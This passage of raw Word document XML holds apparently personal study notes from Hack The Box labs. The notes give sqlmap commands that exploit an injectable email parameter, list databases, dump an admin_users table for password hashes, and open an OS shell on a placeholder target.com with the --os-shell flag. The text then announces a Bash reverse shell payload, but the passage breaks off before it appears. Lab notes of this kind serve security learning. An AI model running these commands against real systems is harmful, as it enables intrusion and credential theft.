        <w:t xml:space="preserve">/path/to/request</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">email </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--batch --level 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001861">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the command they used in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. They didn't know the dbms, so they left it out</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001862">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">parameter to specify the parameter you want to target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And when they left out the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --level 3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we see that we get numerous 500 and 503 responses, and no injection method is identified by sqlmap. The tool itself suggests using a higher --level and/or --risk , so we try setting a higher level to try a wider range of tests, since we know that the parameter is vulnerable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001864">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001865">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can use the terminal only, but BurpSuite helps with the process since you will need to know the exact structure of the username and password format to set the variables. So, just use the Burpsuite method, even though it is a little bit annoying</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001866">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLMap will send all your results to "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/kali/.local/share/sqlmap/output/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usage.htb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usage.htb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the name for the specific example I'm in. But that will change for you. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001867">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001868">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001869">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to enumerate the databases after SQLMap:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000186A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Usage HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000186B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -r request.txt -p email --batch --level 3 --dbs --threads=10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000186C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the same exact command as before but we just added the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--dbs --threads=10 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flags. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000186D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--dbs </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag tells mysql to get a list of the available database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000186E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--threads=10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag is just to tell it to go faster</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000186F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Near the end of the output, you should see something like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001870">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2066925" cy="695325"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="469" name="image461.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image461.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId512"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2066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1871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -r request.txt -p email --batch --level 3 -D </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usage_blog</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --tables --threads=10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001872">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see one non-default database, namely usage_blog . We proceed to enumerate its tables, using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--tables</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001873">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -r reset.req -p email --batch --level 3 -D usage_blog -T </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin_users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001874">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that there are 15 tables. For our intents and purposes, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin_users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> seems the most interesting, as we might find credentials for the administrator dashboard. We dump the table's contents using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--dump </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output is on the screen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001876">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Usage HTB, this lead to a hash for the admin user, and then we cracked it using JohnTheRipper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001877">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001878">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001879">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get shell access after SQLMap:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000187A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000187B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was the path they used in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Validation HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, I think</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000187C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000187D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Once it tells us that a parameter is vulnerable, we will try and get shell access on the server in order to do command injection. The goal is to get a reverse shell from server to our attacking machine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000187E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once SQLMap tells us a parameter is vulnerable, we run SQLMap EXACTLY the same but we add the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--os-shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000187F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://target.com/restricted_page.php/search=*" --cookie="PHPSESSID=your_cookie" --os-shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001880">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This opens up an os-shell, and then we can just input a reverse shell (ex.Bash reverse shell) so that we can stabilize the shell on our attacking machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001881">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use this Bash reverse shell payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
